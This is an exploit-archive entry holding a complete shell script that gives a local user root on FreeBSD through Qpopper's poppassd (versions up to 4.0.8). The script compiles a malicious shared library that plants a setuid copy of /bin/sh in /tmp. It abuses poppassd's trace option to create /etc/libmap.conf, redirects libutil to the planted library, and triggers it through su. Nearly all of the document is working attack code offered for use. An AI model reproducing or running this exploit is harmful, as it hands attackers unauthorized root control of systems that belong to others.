#bsd

1. ========================================================
2. Qpopper <= 4.0.8 (poppassd) Local Root Exploit (freebsd)
3. ========================================================
4.  
5.  
6. #!/bin/sh
7. ###########################################################################
8. # FreeBSD Qpopper poppassd latest version local r00t exploit by kcope ###
9. # tested on FreeBSD 5.4-RELEASE ###
10. ###########################################################################
11.  
12. POPPASSD_PATH=/usr/local/bin/poppassd
13. HOOKLIB=libutil.so.4
14.  
15. echo ""
16. echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
17. echo ""
18. sleep 2
19. umask 0000
20. if [ -f /etc/libmap.conf ]; then
21. echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
22. exit
23. fi
24. cat > program.c << _EOF
25. #include <unistd.h>
26. #include <stdio.h>
27. #include <sys/types.h>
28. #include <stdlib.h>
29.  
30. void _init()
31. {
32. if (!geteuid()) {
33. remove("/etc/libmap.conf");
34. execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
35. }
36. }
37.  
38. _EOF
39. gcc -o program.o -c program.c -fPIC
40. gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
41. cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
42. echo "--- Now type ENTER ---"
43. echo ""
44. $POPPASSD_PATH -t /etc/libmap.conf
45. echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
46. su
47. if [ -f /tmp/xxxx ]; then
48. echo "IT'S A ROOTSHELL!!!"
49. /tmp/xxxx
50. else
51. echo "Sorry, exploit failed."
52. fi
53.  
54.  
55.  
56. # 056FE58749E5C4AA 1337day.com [2014-09-08] 3CFC11BFC696FCE0 #